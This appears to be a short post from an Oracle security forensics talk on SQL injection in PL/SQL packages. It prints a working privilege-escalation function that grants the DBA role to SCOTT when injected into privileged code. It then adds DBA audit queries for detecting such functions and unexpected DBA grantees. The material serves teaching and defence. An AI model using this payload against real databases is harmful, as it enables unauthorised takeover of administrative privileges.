SQL Injection in Oracle PL/SQL packages

Advanced Oracle Security Forensics at UKOUG

Example for 10g

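-- Invoker-rights function (authid current_user) running in its own
-- autonomous transaction: the GRANT executes with the privileges of
-- whichever code ends up calling the function.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
  authid current_user as
  pragma autonomous_transaction;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
  COMMIT;
  RETURN ' ';
END;
/

-- Inject the function into the procedure....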
and much more can be found at
User inserts their own SQL into the programs SQL.ppt
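
An added audit example, not part of the original post: two dictionary queries a DBA can run to find program units that combine the two properties the function above relies on (invoker rights plus an autonomous transaction) and to review who currently holds the DBA role. It assumes a session with SELECT access to DBA_PROCEDURES, DBA_SOURCE and DBA_ROLE_PRIVS; the list of excluded owner schemas is an illustrative assumption.

```sql
-- Added example (not from the original post): audit queries for a DBA.
-- Assumes SELECT access to the DBA_* dictionary views.

-- 1. Invoker-rights program units whose source declares an autonomous
--    transaction, outside Oracle-maintained schemas. The owner list
--    below is an illustrative assumption; extend it for your database.
SELECT p.owner,
       p.object_name,
       MIN(s.line) AS pragma_line
FROM   dba_procedures p
       JOIN dba_source s
         ON s.owner = p.owner
        AND s.name  = p.object_name
WHERE  p.authid = 'CURRENT_USER'
AND    UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%'
AND    p.owner NOT IN ('SYS', 'SYSTEM')
GROUP  BY p.owner, p.object_name
ORDER  BY p.owner, p.object_name;

-- 2. Who holds the DBA role right now. An unexpected grantee such as
--    SCOTT is the visible result of the GRANT in the example function.
SELECT grantee, admin_option, default_role
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER  BY grantee;
```

Any row from the first query that belongs to a low-privileged application or demo account deserves a source review, since legitimate code rarely needs both properties together.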
